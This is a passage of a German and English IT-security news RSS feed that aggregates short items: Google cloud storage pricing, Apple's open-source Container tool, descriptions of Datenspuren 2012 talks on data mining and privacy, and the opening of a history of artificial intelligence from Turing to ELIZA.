<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden. Oder sie merken von der Änderung nicht wirklich viel. Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Container: Open-source tool for Linux containers on the Mac]]></title>
<description><![CDATA[Developers on Apple silicon Macs have run Linux containers through software built around a single shared virtual machine for years. Apple’s open-source Container project gives each Linux workload its own lightweight virtual machine. Container is written in Swift and tuned for Apple silicon. It cr...]]></description>
<link>https://tsecurity.de/de/3650534/it-security-nachrichten/apple-container-open-source-tool-for-linux-containers-on-the-mac/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650534/it-security-nachrichten/apple-container-open-source-tool-for-linux-containers-on-the-mac/</guid>
<pubDate>Tue, 07 Jul 2026 07:24:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Developers on Apple silicon Macs have run Linux containers through software built around a single shared virtual machine for years. Apple’s open-source Container project gives each Linux workload its own lightweight virtual machine. Container is written in Swift and tuned for Apple silicon. It creates and runs Linux containers as lightweight virtual machines, and it works with OCI-compatible images, so a developer can pull from and push to any standard registry. Images built with it … <a href="https://www.helpnetsecurity.com/2026/07/07/apple-container-open-source-linux-mac/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/07/apple-container-open-source-linux-mac/">Apple Container: Open-source tool for Linux containers on the Mac</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PentaNews GameShow (ds2012)]]></title>
<description><![CDATA[Die coole Pentanews gameshow hat das Publikum schon auf zahlreichen (3) Chaos-Events zum lachen und mitdenken gebracht.
In heiterer Runde geht es darum, details absurder News, die eh jeder schon bei fefe & co gelesen hat, zu ergänzen. 
Das is' aber dann doch immer gar nicht so einfach und deswege...]]></description>
<link>https://tsecurity.de/de/3650427/it-security-video/pentanews-gameshow-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650427/it-security-video/pentanews-gameshow-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 05:48:30 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die coole Pentanews gameshow hat das Publikum schon auf zahlreichen (3) Chaos-Events zum lachen und mitdenken gebracht.
In heiterer Runde geht es darum, details absurder News, die eh jeder schon bei fefe &amp; co gelesen hat, zu ergänzen. 
Das is' aber dann doch immer gar nicht so einfach und deswegen stehen den Mitspielern hierfür mächtige Joker (wie z.B. aktuelles Meinungsbild aus dem IRC) zur Seite.

… denn pentaradio Hörer/innen wissen mehr!
about this event: https://datenspuren.de/2012/fahrplan/events/5080.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Max Mustermann und Du (ds2012)]]></title>
<description><![CDATA[Informationelle Selbstbestimmung setzt die Kontrolle von personenbezogenen Daten durch die User voraus. Wenn aber die neue Informationen später auf Basis von Data Mining erzeugt werden schlägt der Datenschutz fehl. "The Panoptic Sort" beschreibt die Folgen von Data Mining und übermäßiger Statisti...]]></description>
<link>https://tsecurity.de/de/3650416/it-security-video/max-mustermann-und-du-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650416/it-security-video/max-mustermann-und-du-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 05:33:17 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Informationelle Selbstbestimmung setzt die Kontrolle von personenbezogenen Daten durch die User voraus. Wenn aber die neue Informationen später auf Basis von Data Mining erzeugt werden schlägt der Datenschutz fehl. &quot;The Panoptic Sort&quot; beschreibt die Folgen von Data Mining und übermäßiger Statistigläubigkeit. Der Vortrag stellt aktuelle Verfahren vor und soll die Diskussion über Gegenmaßnahmen und Alternativen anregen.

Seit 1983 werden „personenbezogene Informationen“ als Teil der Persönlichkeit verstanden und im Datenschutz institutionalisiert. Dabei werden (nur) solche Daten als schützenswert betrachtet, die einer &quot;bestimmten oder bestimmbaren&quot; Person zugeordnet werden können. Kern der Idee der informationellen Selbstbestimmung ist die Kontrolle der Informationen über eine Person durch eben diese selbst. Knapp 30 Jahre später gilt es Vielen als unmöglich, dieses Recht wahrzunehmen und die Kontrolle über die eigene Selbstbeschreibung durch Informationen aufrecht zu erhalten. 

Eines der Probleme ist dabei, dass nicht mehr die klassischen personenbezogen Informationen - wie Namen und Merkmale - zur „Kontrolle“ des Selbstbildes ausreichen, sondern die Beschreibung von der anderen Seite her erfolgt. Der Kontrollverlust erfolgt nicht nur durch das, vom User aktivierte, frictionless sharing mit nicht kontrollierbarer Weiterverbreitung, sondern auch dadurch, dass die den User beschreibenden Informationen durch Data Mining generiert und durch die, die Computer bedienendene Menschen, verbreitet werden. Die Höhe eines Einkommens ist also nicht deswegen öffentlich, weil es getwittert oder sonst wie veröffentlicht wird, sondern weil aus einer Statistik über das durchschnittliche Einkommen von Max Mustermann in jenem Wohnblock, bei jenem Geschlecht und jener Nationalität berechnet wird.

Diese informationelle Fremdbestimmung findet ihrer Sinn darin, dass Informationen, die eine Person beschreiben, nicht nur einen Wert für den_die Einzelne haben, sondern zunehmend auch einen ökonomischen. Die Wertschöpfung erfolgt dabei über die Transformation von Daten – für sich selbst genommen wertlose Datenkolonnen – in verwertbare Informationen, die oft konform mit dem Datenschutzrecht – etwa auf Basis anonymisierter Daten – arbeiten. Durch Profiling und statistische Analysen werden auch pseudonyme oder anonyme Daten zu Informationen, die Auswirkungen auf die Freiheit in der Lebensgestaltung der Einzelnen haben, wenn sie wieder mit personenbezogenen Daten zusammengeführt werden. Vom behavioural targeting und Empfehlungen, wie sie etwa Amazon benutzt, bis zum Scoring der Schufa werden Einzelne immer wieder automatisch kategorisiert, einsortiert und Handlungsmöglichkeiten - z.B. was du von welchem Geld kaufen kannst - eingegrenzt.
Weil solche Techniken besonders gerne für Marketingzwecke benutzt werden, sind die Folgen dieser Kategorisierung auf Grund von Statistiken und Prognosen – schon 1993 von Oscar H. Gandy als “panoptic sort“ beschrieben - meist ökonomische. Durch Preisdiskriminierung werden etwa unterschiedliche Preise für unterschiedliche 'Zielgruppen' berechnet oder bei Marktdiskriminierung ein Produkt einer bestimmten Gruppen gar nicht angeboten.

Gleichzeitig funktioniert das Einsortieren nie perfekt, das zeigen immer wieder Beispiele schlecht gezielter Marketingaktionen. Gefährlich ist der panoptic sort aber gerade dann, wenn er unbemerkt – vermeintlich gut -  funktioniert. Die Folgen sinid dabei unterschiedlich weitreichend. Ob man etwa ständig an der Kasse im Supermarkt das Unterschrift- oder das PIN-Verfahren bei Kartenzahlung angeboten bekommt oder die Wohnung nach SCHUFA Abfrage doch nicht kriegt. Unbemerkte Diskriminierung sorgen für sich selbst erfüllende Prognose und die Festigung von bestehenden Verhältnisse.

Der Vortrag beschreibt Beispiele von gelungenem und misslungenem panoptic sort, sowie die theoretischen Hintergründe, will aber auch (technische) Gegenstrategien diskutiere.
about this event: https://datenspuren.de/2012/fahrplan/events/5072.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Irrwege und irre Wege in die digitale Zukunft (ds2012)]]></title>
<description><![CDATA[Das Problem mit unserer Gegenwart ist, dass sich die Möglichkeiten und Arten der Informationsverbreitung schneller entwickeln, als wir mit unserem Verhalten und versuchten Regulierungen hinterherkommen. Das ist faszinierend, macht neugierig auf die Zukunft, erzeugt aber auch starke Reibungen. Der...]]></description>
<link>https://tsecurity.de/de/3650388/it-security-video/irrwege-und-irre-wege-in-die-digitale-zukunft-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650388/it-security-video/irrwege-und-irre-wege-in-die-digitale-zukunft-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 05:18:14 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Problem mit unserer Gegenwart ist, dass sich die Möglichkeiten und Arten der Informationsverbreitung schneller entwickeln, als wir mit unserem Verhalten und versuchten Regulierungen hinterherkommen. Das ist faszinierend, macht neugierig auf die Zukunft, erzeugt aber auch starke Reibungen. Der Zuhörer wird nach dem Vortrag vermutlich nicht mehr Antworten wissen, aber er sollte Anregungen zum Nachdenken bekommen haben und etwas optimistischer sein, als einer schrumpfenden Privatsphäre nachzutrauern.

Die &quot;Digitalisierung&quot; passiert so schnell, dass Gesetze, Modelle zum Geld verdienen und sogar das soziale Verhalten dem Stand der Technik oft hilflos hinterherhinken. Speicherplatz vergrößert sich viel schneller, als wir es geahnt haben, und die Vernetzung übersteigt die kühnsten Utopien.

Das gebiert natürlich eine Masse an Problemen: Daten lassen sich nicht mehr zuverlässig löschen oder sicher und dauerhaft zurückhalten, alte Modelle des Geld Verdienens (Stichwort Urheberrecht) scheitern grandios, ebenso die Manipulierung der Medien, die Privatsphäre ist gefährdet, die Sicherheitsindustrie ist eigentlich ziemlich ratlos (ohne das einzugestehen).

Auf der anderen Seite erzeugt diese Entwicklung aber viel mehr Positives: Wir können uns das Leben mit der Technik von vor 10 (oder weniger) Jahren gar nicht mehr vorstellen - und das geht schon lange so. Der Konsument von Nachrichten wird zum Produzenten, Wissen wird Allgemeingut, soziale Kontakte explodieren förmlich.

Wir sollten uns also besser von unrealistischen Forderungen wie etwa dem &quot;Recht am eigenen Bild&quot; leise weinend trennend und überlegen, wie wir die Zukunft gestalten könnten.
about this event: https://datenspuren.de/2012/fahrplan/events/5005.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Max Mustermann und Du (ds2012)]]></title>
<description><![CDATA[Informationelle Selbstbestimmung setzt die Kontrolle von personenbezogenen Daten durch die User voraus. Wenn aber die neue Informationen später auf Basis von Data Mining erzeugt werden schlägt der Datenschutz fehl. "The Panoptic Sort" beschreibt die Folgen von Data Mining und übermäßiger Statisti...]]></description>
<link>https://tsecurity.de/de/3650387/it-security-video/max-mustermann-und-du-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650387/it-security-video/max-mustermann-und-du-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 05:18:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Informationelle Selbstbestimmung setzt die Kontrolle von personenbezogenen Daten durch die User voraus. Wenn aber die neue Informationen später auf Basis von Data Mining erzeugt werden schlägt der Datenschutz fehl. &quot;The Panoptic Sort&quot; beschreibt die Folgen von Data Mining und übermäßiger Statistigläubigkeit. Der Vortrag stellt aktuelle Verfahren vor und soll die Diskussion über Gegenmaßnahmen und Alternativen anregen.

Seit 1983 werden „personenbezogene Informationen“ als Teil der Persönlichkeit verstanden und im Datenschutz institutionalisiert. Dabei werden (nur) solche Daten als schützenswert betrachtet, die einer &quot;bestimmten oder bestimmbaren&quot; Person zugeordnet werden können. Kern der Idee der informationellen Selbstbestimmung ist die Kontrolle der Informationen über eine Person durch eben diese selbst. Knapp 30 Jahre später gilt es Vielen als unmöglich, dieses Recht wahrzunehmen und die Kontrolle über die eigene Selbstbeschreibung durch Informationen aufrecht zu erhalten. 

Eines der Probleme ist dabei, dass nicht mehr die klassischen personenbezogen Informationen - wie Namen und Merkmale - zur „Kontrolle“ des Selbstbildes ausreichen, sondern die Beschreibung von der anderen Seite her erfolgt. Der Kontrollverlust erfolgt nicht nur durch das, vom User aktivierte, frictionless sharing mit nicht kontrollierbarer Weiterverbreitung, sondern auch dadurch, dass die den User beschreibenden Informationen durch Data Mining generiert und durch die, die Computer bedienendene Menschen, verbreitet werden. Die Höhe eines Einkommens ist also nicht deswegen öffentlich, weil es getwittert oder sonst wie veröffentlicht wird, sondern weil aus einer Statistik über das durchschnittliche Einkommen von Max Mustermann in jenem Wohnblock, bei jenem Geschlecht und jener Nationalität berechnet wird.

Diese informationelle Fremdbestimmung findet ihrer Sinn darin, dass Informationen, die eine Person beschreiben, nicht nur einen Wert für den_die Einzelne haben, sondern zunehmend auch einen ökonomischen. Die Wertschöpfung erfolgt dabei über die Transformation von Daten – für sich selbst genommen wertlose Datenkolonnen – in verwertbare Informationen, die oft konform mit dem Datenschutzrecht – etwa auf Basis anonymisierter Daten – arbeiten. Durch Profiling und statistische Analysen werden auch pseudonyme oder anonyme Daten zu Informationen, die Auswirkungen auf die Freiheit in der Lebensgestaltung der Einzelnen haben, wenn sie wieder mit personenbezogenen Daten zusammengeführt werden. Vom behavioural targeting und Empfehlungen, wie sie etwa Amazon benutzt, bis zum Scoring der Schufa werden Einzelne immer wieder automatisch kategorisiert, einsortiert und Handlungsmöglichkeiten - z.B. was du von welchem Geld kaufen kannst - eingegrenzt.
Weil solche Techniken besonders gerne für Marketingzwecke benutzt werden, sind die Folgen dieser Kategorisierung auf Grund von Statistiken und Prognosen – schon 1993 von Oscar H. Gandy als “panoptic sort“ beschrieben - meist ökonomische. Durch Preisdiskriminierung werden etwa unterschiedliche Preise für unterschiedliche 'Zielgruppen' berechnet oder bei Marktdiskriminierung ein Produkt einer bestimmten Gruppen gar nicht angeboten.

Gleichzeitig funktioniert das Einsortieren nie perfekt, das zeigen immer wieder Beispiele schlecht gezielter Marketingaktionen. Gefährlich ist der panoptic sort aber gerade dann, wenn er unbemerkt – vermeintlich gut -  funktioniert. Die Folgen sinid dabei unterschiedlich weitreichend. Ob man etwa ständig an der Kasse im Supermarkt das Unterschrift- oder das PIN-Verfahren bei Kartenzahlung angeboten bekommt oder die Wohnung nach SCHUFA Abfrage doch nicht kriegt. Unbemerkte Diskriminierung sorgen für sich selbst erfüllende Prognose und die Festigung von bestehenden Verhältnisse.

Der Vortrag beschreibt Beispiele von gelungenem und misslungenem panoptic sort, sowie die theoretischen Hintergründe, will aber auch (technische) Gegenstrategien diskutiere.
about this event: https://datenspuren.de/2012/fahrplan/events/5072.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Eine kleine Geschichte der künstlichen Intelligenz]]></title>
<description><![CDATA[Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz – vom Mathematiker Turing bis zum IBM-System Watson.
					Foto: John Williams RUS – shutterstock.com




In den letzten Jahren wurden in der Computerwissenschaft und bei der künstlichen Intelligenz (KI) ungl...]]></description>
<link>https://tsecurity.de/de/3650375/it-security-nachrichten/eine-kleine-geschichte-der-kuenstlichen-intelligenz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650375/it-security-nachrichten/eine-kleine-geschichte-der-kuenstlichen-intelligenz/</guid>
<pubDate>Tue, 07 Jul 2026 05:07:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz - vom Mathematiker Turing bis zum IBM-System Watson." title="Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz - vom Mathematiker Turing bis zum IBM-System Watson." src="https://images.computerwoche.de/bdb/2683556/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Eine kleine Geschichte der KI zeigt die wichtigsten Stationen der Künstlichen Intelligenz – vom Mathematiker Turing bis zum IBM-System Watson.</p></figcaption></figure><p class="imageCredit">
					Foto: John Williams RUS – shutterstock.com</p></div>




<p>In den letzten Jahren wurden in der Computerwissenschaft und bei der künstlichen Intelligenz (KI) unglaubliche Fortschritte erzielt. Watson, Siri oder Deep Learning zeigen, dass KI-Systeme inzwischen Leistungen vollbringen, die als intelligent und kreativ eingestuft werden müssen. Und es gibt heute immer weniger Unternehmen, die auf <a title="Künstliche Intelligenz" href="https://www.computerwoche.de/article/2753333/wie-kuenstliche-intelligenz-arbeit-und-gesellschaft-veraendert.html" target="_blank">KI</a> verzichten können, wenn sie ihr Business optimieren oder Kosten sparen möchten.</p>



<p>KI-Systeme sind zweifellos sehr nützlich. In dem Maße wie die Welt komplexer wird, müssen wir unsere menschlichen Ressourcen klug nutzen, und qualitativ hochwertige Computersysteme helfen dabei. Dies gilt auch für Anwendungen, die Intelligenz erfordern. Die andere Seite der KI-Medaille ist: Die Möglichkeit, dass eine Maschine Intelligenz besitzen könnte, erschreckt viele. Die meisten Menschen sind der Ansicht, dass Intelligenz etwas einzigartiges ist, was den Homo sapiens auszeichnet. Wenn Intelligenz aber mechanisiert werden kann, was ist dann noch einzigartig am Menschen und was unterscheidet ihn von der Maschine?</p>



<p>Das Streben nach einer künstlichen Kopie des Menschen und der damit verbundene Fragenkomplex sind nicht neu. Die Reproduktion und Imitation des Denkens beschäftigte schon unsere Vorfahren. Vom 16. Jahrhundert an wimmelte es in Legenden und in der Realität von künstlichen Geschöpfen. Homunculi, mechanische Automaten, der Golem, der Mälzel’sche Schachautomat oder Frankenstein waren in den vergangenen Jahrhunderten alles phantasievolle oder reale Versuche, künstlich Intelligenzen herzustellen – und das zu nachzuahmen, was uns Wesentlich ist.</p>



<h2 class="wp-block-heading">Künstliche Intelligenz – die Vorarbeiten</h2>



<p>Allein, es fehlten die formalen und materiellen Möglichkeiten, in denen sich Intelligenz realisieren konnte. Dazu sind zumindest zwei Dinge notwendig. Auf der einen Seite braucht es eine formale Sprache, in die sich kognitive Prozesse abbilden lassen und in der sich rein formal – zum Beispiel durch Regelanwendungen – neues Wissen generieren lässt. Ein solcher formaler Apparat zeichnete sich Ende des 19. Jahrhunderts mit der Logik ab.</p>



<p>Die Philosophen und Mathematiker Gottfried Wilhelm Leibniz, George Boole und Gottlob Frege haben die alte aristotelische Logik entscheidend weiterentwickelt, und in den 30er Jahren des letzten Jahrhunderts zeigte der Österreicher Kurt Gödel mit dem Vollständigkeitssatz die Möglichkeiten – und mit den Unvollständigkeitssätzen die Grenzen – der Logik auf.</p>



<p>Auf der anderen Seite war – analog dem menschlichen Gehirn – ein “Behältnis” oder Medium notwendig, in dem dieser Formalismus “ablaufen” konnte und in dem sich die künstliche Intelligenz realisieren lässt. Mechanische Apparate waren hierfür nicht geeignet, erst mit der Erfindung der Rechenmaschine eröffnete sich eine aussichtsreiche Möglichkeit. In den dreißiger Jahren des 20. Jahrhunderts wurde die Idee einer Rechenmaschine, die früher schon Blaise Pascal und Charles Babbage hatten, wiederbelebt. Während Pascal und Babbage lediglich am Rechner als Zahlenmaschine interessiert waren, die praktischen Zwecken dienen sollte, entstanden zu Beginn des 20. Jahrhunderts konkrete Visionen einer universellen Rechenmaschine.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich." title="Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich." src="https://images.computerwoche.de/bdb/2683544/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der britische Mathematiker Alan Turing beeinflusste die Entwicklung der Künstlichen Intelligenz maßgeblich.</p></figcaption></figure><p class="imageCredit">
					Foto: Computerhistory.org</p></div>




<p>Einer der wichtigsten Visionäre und Theoretiker war Alan Turing (1912-1954): 1936 bewies der britische Mathematiker, dass eine universelle Rechenmaschine – heute als Turing-Maschine bekannt – möglich ist. Turings zentrale Erkenntnis ist: Eine solche Maschine ist fähig, jedes Problem zu lösen, sofern es durch einen Algorithmus darstellbar und lösbar ist. Übertragen auf menschliche Intelligenz bedeutet das: Sind kognitive Prozesse algorithmisierbar – also in endliche wohldefinierte Einzelschritte zerlegbar – können diese auf einer Maschine ausgeführt werden. Ein paar Jahrzehnte später wurden dann tatsächlich die ersten praktisch verwendbaren Digitalcomputer gebaut. Damit war die “physische Trägersubstanz” für künstliche Intelligenz verfügbar.</p>



<h2 class="wp-block-heading">Der Turing-Test: 1950</h2>



<p>Turing ist noch wegen einer anderen Idee wichtig für die KI: In seinem berühmten Artikel “Computing Machinery and Intelligence” aus dem Jahr 1950 schildert er folgendes Szenario: Angenommen, jemand behauptet, er hätte einen Computer auf dem Intelligenzniveau eines Menschen programmiert. Wie können wir diese Aussage überprüfen? Die naheliegende Möglichkeit, ein IQ-Test, ist wenig sinnvoll. Denn dieser misst lediglich den Grad der Intelligenz, setzt aber eine bestimmte Intelligenz bereits voraus. Bei Computern stellt sich aber gerade die Frage, ob ihnen überhaupt Intelligenz zugesprochen werden kann.</p>



<p>Turing war sich des Problems bei der Definition von intelligentem menschlichem Verhalten im Vergleich zur Maschine bewusst. Um philosophische Diskussionen über die Natur menschlichen Denkens zu umgehen, schlug Turing einen operationalen Test für diese Frage vor.</p>



<p>Ein Computer, sagt Turing, sollte dann als intelligent bezeichnet werden, wenn Menschen bei einem beliebigen Frage-und-Antwort-Spiel, das über eine elektrische Verbindung durchgeführt wird, nicht unterscheiden können, ob am anderen Ende der Leitung dieser Computer oder ein anderer Mensch sitzt. Damit die Stimme und andere menschliche Attribute nichts verraten, solle die Unterhaltung, so Turing, über eine Fernschreiberverbindung – heute würde man sagen: ein Terminal mit Tastatur – erfolgen.</p>



<p>Turings Test zeigt, wie Intelligenz ohne Bezugnahme auf eine physikalische Trägersubstanz geprüft werden kann. Intelligenz ist nicht an die biologische Trägermasse Gehirn gebunden und es würde nichts bringen, eine Denkmaschine durch Einbettung in künstliches Fleisch menschlicher zu machen. Unwichtige physische Eigenschaften – Aussehen, Stimme – werden durch die Versuchsanordnung ausgeschaltet, erfasst wird das reine Denken. Turings Gedankenspiele mündeten später in die Auseinandersetzung zwischen starker und schwacher KI.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Turing-Test: Wer ist Mensch und wer ist Maschine?" title="Der Turing-Test: Wer ist Mensch und wer ist Maschine?" src="https://images.computerwoche.de/bdb/2683545/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Turing-Test: Wer ist Mensch und wer ist Maschine?</p></figcaption></figure><p class="imageCredit">
					Foto: Suresh Kumar Mukhiya</p></div>




<h2 class="wp-block-heading">Big Bang in Dartmouth: Das erste KI-Programm – 1956</h2>



<p>Drei Jahre nach Turings Tod, im Jahr 1956, beginnt die eigentliche Geschichte der<a title=" Künstlichen Intelligenz" href="https://www.computerwoche.de/article/2752649/was-sie-ueber-maschinelles-lernen-wissen-muessen.html" target="_blank"> Künstlichen Intelligenz</a>. Als KI-Urknall gilt das “Summer Research Project on <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/kuenstliche-intelligenz-artifical-intelligence,3544" target="_blank">Artificial Intelligence</a>” in Dartmouth im US-Bundesstaat New Hampshire. Unter den Teilnehmern befanden sich der Lisp-Erfinder John McCarthy (1927-2011), KI-Forscher Marvin Minsky (1927-2016), <a class="idgGlossaryLink" href="https://www.computerwoche.de/industry/" target="_blank">IBM</a>-Mitarbeiter Nathaniel Rochester (1919-2001), der Informationstheoretiker Claude Shannon (1916-2001) sowie der Kognitionspsychologe Alan Newell (1927-1992) und der spätere Ökonomie-Nobelpreisträger Herbert Simon (1916-2001).</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde." title="Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde." src="https://images.computerwoche.de/bdb/2683547/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Eine Tafel am Gebäude des Dartmouth College erinnert an die legendäre Konferenz von 1956, auf der der Begriff „Artificial Intelligence“ ins Leben gerufen wurde.</p></figcaption></figure><p class="imageCredit">
					Foto: Dartmouth.edu</p></div>




<p>Projekte zur maschinellen Sprachübersetzung wurden in Millionenhöhe von der amerikanischen Regierung gefördert. Sätze wurden Wort für Wort übersetzt, zusammengestellt und an die jeweilige Zielsprache angepasst. Die Probleme reduzierten sich darauf, umfangreiche Wörterbücher anzulegen und effizient abzusuchen. Man verkannte in dieser Phase der KI-Forschung, dass Sprache vage und mehrdeutig ist und für automatisches Übersetzen vor allen Dingen umfangreiches Weltwissen erforderlich ist<em>.</em></p>



<h2 class="wp-block-heading">Künstliche Intelligenz im Elfenbeinturm: 1965 bis 1975</h2>



<p>Die zweite Ära der KI lässt sich etwa zwischen 1965 und 1975 ansiedeln und mit dem Schlagwort KI-Winter und Forschung im Elfenbeinturm umschreiben. Weil nicht genügend Fortschritte erkennbar waren, wurde die Finanzierung der US-Regierung für KI-Projekte gekürzt. KI-Forscher zogen sich daraufhin in den Elfenbeinturm zurück und agierten in Spielzeugwelten ohne praktischen Nutzen.</p>



<p>Frustriert von der Komplexität der natürlichen Welt bauten die Forscher in dieser Phase Systeme, die auf künstliche Mikrowelten beschränkt waren. Die Wissenschaftler hofften damit, sich auf das Wesentliche konzentrieren zu können und durch Erweiterung der Mikrowelt-Systeme nach und nach natürliche Umgebungen in den Griff zu bekommen. In dieser Phase erkannten die KI-Forscher die Bedeutung von Wissen für intelligente Systeme.</p>



<p>Ein typisches Programm dieser Periode mit einigem Aufmerksamkeitswert ist SHRDLU von Terry Winograd (1972). Das natürlichsprachliche System agiert in einer überschaubaren Klötzchenwelt, beantwortet Fragen nach der Lage von Klötzchen und stellt Klötzchen auf Anfrage symbolisch um. SHRDLU gilt als das erste Programm, das Sprachverständnis und die Simulation planvoller Tätigkeiten miteinander verbindet.</p>



<p>Ebenfalls in einer überdimensionalen Klötzchenwelt lebte der Ende der sechziger Jahre in Stanford entwickelte erste autonome Roboter – aufgrund seiner ruckartigen Bewegungen SHAKEY genannt. Der Kopf ist eine drehbare Kamera, der Körper ein riesiger Computer. Man konnte ihm Anweisungen geben, wie etwa einen Block von einem Zimmer in ein anderes Zimmer zu bringen. Das dauerte allerdings ziemlich lange. SHAKEY funktionierte leider nur in dieser Laufstall-Umwelt, in der realen Welt war er zum Scheitern verurteilt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt." title="SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt." src="https://images.computerwoche.de/bdb/2683549/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">SHRDLU ist ein natürlichsprachliches System, das in einer überschaubaren Klötzchenwelt agiert, Fragen nach der Lage von Klötzchen beantwortet und Klötzchen auf Anfrage symbolisch umstellt.</p></figcaption></figure><p class="imageCredit">
					Foto: http://hci.stanford.edu/winograd/shrdlu/</p></div>




<p>Ende der 1960er Jahre war die Geburtsstunde des ersten <a href="https://www.computerwoche.de/article/2753417/was-unternehmen-ueber-chatbots-wissen-muessen.html" target="_blank" class="idgGlossaryLink">Chatbots</a>: Der KI-Pionier und spätere KI-Kritiker Joseph Weizenbaum (1923-2008) vom MIT entwickelte mit einem relativ simplen Verfahren das “sprachverstehende” Programm ELIZA. Simuliert wird dabei der Dialog eines Psychotherapeuten mit einem Klienten. Das Programm übernahm den Part des Therapeuten, der Nutzer konnte sich mit ihm per Tastatur unterhalten. Weizenbaum selbst war überrascht, auf welch einfache Weise man Menschen die Illusion eines Partners aus Fleisch und Blut vermitteln kann. Er berichtete, seine Sekretärin hätte sich nur in seiner Abwesenheit mit ELIZA unterhalten, was er so interpretierte, dass sie mit dem Computer über ganz persönliche Dinge sprach.</p>



